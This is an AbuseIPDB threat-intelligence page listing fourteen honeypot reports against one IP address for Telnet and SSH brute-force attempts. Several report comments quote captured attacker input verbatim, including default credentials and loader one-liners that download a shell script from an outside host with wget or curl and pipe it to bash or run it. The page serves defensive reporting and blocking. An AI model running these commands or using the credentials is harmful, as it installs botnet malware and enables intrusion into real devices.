JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 85.211.203.196

85.211.203.196 was found in our database!

This IP was reported 14 times. Confidence of Abuse is 75%: ?

75%

ISP	Microsoft Limited
Usage Type	Data Center/Web Hosting/Transit
ASN	AS8075
Domain Name	microsoft.com
Country	🇲🇾 Malaysia
City	Kuala Lumpur, Kuala Lumpur

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 85.211.203.196

Whois 85.211.203.196

IP Abuse Reports for 85.211.203.196:

This IP address has been reported a total of 14 times from 13 distinct sources. 85.211.203.196 was first reported on June 27th 2026, and the most recent report was 22 hours ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇺🇸 sargetun	2026-06-28 18:45:37 (22 hours ago)	Honeypot: Auto-ban: 24 hour idle after honeypot interaction. Auto-reported from VPS honeypot.	Brute-Force SSH Hacking
🇺🇸 rjdefrancisco	2026-06-28 07:06:15 (1 day ago)	Unwanted traffic detected by honeypot on June 27, 2026: brute force and hacking attacks (1 over teln ... show more Unwanted traffic detected by honeypot on June 27, 2026: brute force and hacking attacks (1 over telnet). show less	Port Scan Brute-Force SSH
🇨🇭 m_vlasov	2026-06-27 18:29:16 (1 day ago)	SSH/Telnet honeypot: 1 login attempts, 1 sessions, 6 shell commands.	Port Scan Brute-Force SSH Hacking IoT Targeted
🇬🇧 gbzret4d	2026-06-27 18:26:53 (1 day ago)	Honeypot [uk-production01]: Brute-force attack detected on 23/TELNET • Credential used: root:123456 ... show more Honeypot [uk-production01]: Brute-force attack detected on 23/TELNET • Credential used: root:123456 • Number of login attempts: 1 • 4 command(s) were executed during the session show less	Hacking
🇩🇪 Justin F. \| AS204464	2026-06-27 17:57:03 (1 day ago)	Honeypot [nx-infrastructure]: Brute-force attack detected on 23/TELNET • Credentials: admin:admin, w ... show more Honeypot [nx-infrastructure]: Brute-force attack detected on 23/TELNET • Credentials: admin:admin, wget -q -O- http://202604157.xyz/snh5ye.sh \| bash:curl -s http://202604157.xyz/snh5ye.sh \| bash, busybox wget -q -O- http://202604157.xyz/snh5ye.sh \| bash:cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://202604157.xyz/snh5ye.sh; curl -O http://202604157.xyz/snh5ye.sh; chmod 777 snh5ye.sh; sh snh5ye.sh; rm -rf snh5ye.sh, cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://202604157.xyz/snh5ye.sh; curl -O http://202604157.xyz/snh5ye.sh; chmod 777 snh5ye.sh; sh snh5ye.sh; rm -rf snh5ye.sh:cd /tmpcd /var/runcd /mntcd /rootcd /;wget -q http://202604157.xyz/snh5ye.sh -O .wbv74siz;sh .wbv74siz;rm -f .wbv74siz • Number of login attempts: 4 Reported by: Justin F. show less	Brute-Force Hacking
🇩🇪 NxtGenIT	2026-06-27 17:47:02 (1 day ago)	Cowrie Honeypot hit, Event Type: cowrie.command.input, Command: CMD: wget -q -O- http://202604157.xy ... show more Cowrie Honeypot hit, Event Type: cowrie.command.input, Command: CMD: wget -q -O- http://202604157.xyz/snh5ye.sh \| bash show less	Brute-Force
🇫🇷 COMAITE	2026-06-27 17:43:02 (2 days ago)	Honeypot login success	Brute-Force
🇩🇪 anycast_ac	2026-06-27 17:21:57 (2 days ago)	[mirai-detector honeypot] Inbound attack against our honeypot on tcp/23 (telnet). Tried credentials: ... show more [mirai-detector honeypot] Inbound attack against our honeypot on tcp/23 (telnet). Tried credentials: b'root':b'' Commands captured: $ wget -q -O- http://202604157.xyz/snh5ye.sh \| bash $ curl -s http://202604157.xyz/snh5ye.sh \| bash $ busybox wget -q -O- http://202604157.xyz/snh5ye.sh \| bash $ cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://202604157.xyz/snh5ye.sh; curl -O http://202604157.xyz/snh5ye.sh; chmod 777 snh5ye.sh; sh snh5ye.sh; r $ cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://202604157.xyz/snh5ye.sh; curl -O http://202604157.xyz/snh5ye.sh; chmod 777 snh5ye.sh; sh snh5ye.sh; r Loader URLs the bot tried to fetch: - http://202604157.xyz/snh5ye.sh show less	DDoS Attack IoT Targeted Brute-Force
🇫🇮 Luhte	2026-06-27 17:11:41 (2 days ago)	Unauthorised SSH/Telnet login attempt with user "root" at 2026-06-27T17:11:41Z	Brute-Force SSH
🇩🇪 dispaisyenterprises	2026-06-27 17:07:53 (2 days ago)	Honeypot [fra-de-honeypot]: Brute-force attack detected on 23/TELNET • Credentials: root:root, wget ... show more Honeypot [fra-de-honeypot]: Brute-force attack detected on 23/TELNET • Credentials: root:root, wget -q -O- http://202604157.xyz/snh5ye.sh \| bash:curl -s http://202604157.xyz/snh5ye.sh \| bash, busybox wget -q -O- http://202604157.xyz/snh5ye.sh \| bash:cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://202604157.xyz/snh5ye.sh; curl -O http://202604157.xyz/snh5ye.sh; chmod 777 snh5ye.sh; sh snh5ye.sh; rm -rf snh5ye.sh, cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://202604157.xyz/snh5ye.sh; curl -O http://202604157.xyz/snh5ye.sh; chmod 777 snh5ye.sh; sh snh5ye.sh; rm -rf snh5ye.sh:cd /tmpcd /var/runcd /mntcd /rootcd /;wget -q http://202604157.xyz/snh5ye.sh -O .wbv74siz;sh .wbv74siz;rm -f .wbv74siz • Number of login attempts: 4 Reported by DisPaisy Enterprises (dispaisy.systems) using: https://github.com/sefinek/T-Pot-To-AbuseIPDB show less	Brute-Force Hacking
🇫🇮 FDC	2026-06-27 17:00:45 (2 days ago)	Malicious activity from 85.211.203.196 detected by FDC honeypots. Categories: 14,15,20,22. 12 events ... show more Malicious activity from 85.211.203.196 detected by FDC honeypots. Categories: 14,15,20,22. 12 events in last 24h. show less	Port Scan Hacking Exploited Host SSH
🇨🇦 Luhte	2026-06-27 16:32:23 (2 days ago)	Unauthorised SSH/Telnet login attempt with user "root" at 2026-06-27T16:32:23Z	Brute-Force SSH
🇨🇦 dpinse	2026-06-27 16:30:07 (2 days ago)	Honeypot [honeypot-ca-sensor1]: Brute-force attack detected on 23/TELNET • Credentials: user:user, w ... show more Honeypot [honeypot-ca-sensor1]: Brute-force attack detected on 23/TELNET • Credentials: user:user, wget -q -O- http://202604157.xyz/snh5ye.sh \| bash:curl -s http://202604157.xyz/snh5ye.sh \| bash • Number of login attempts: 2 • 9 command(s) were executed during the session • Suspicious file URLs: http://202604157.xyz/snh5ye.sh show less	Web App Attack Brute-Force Hacking
🇺🇸 ShadowWhisperer	2026-06-27 03:44:11 (2 days ago)	TELNET credential attempt.	Brute-Force IoT Targeted

Showing 1 to 14 of 14 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇨🇳 222.247.32.186

🇺🇸 136.56.34.147

🇫🇮 147.185.133.165

🇨🇳 124.88.117.114

🇳🇱 91.92.40.7

🇴🇲 37.41.237.150

🇧🇪 34.52.222.189

🇺🇸 207.90.244.19

🇺🇸 195.184.76.202

🇳🇱 185.242.226.112

🇵🇱 146.59.32.16

🇲🇾 121.122.119.170

🇳🇱 91.92.40.176

🇷🇺 77.232.137.205

🇺🇸 74.235.185.121

🇩🇪 69.5.169.236

🇺🇸 66.132.195.29

🇨🇳 60.172.230.184

🇺🇸 3.229.2.217

🇨🇭 2.59.219.107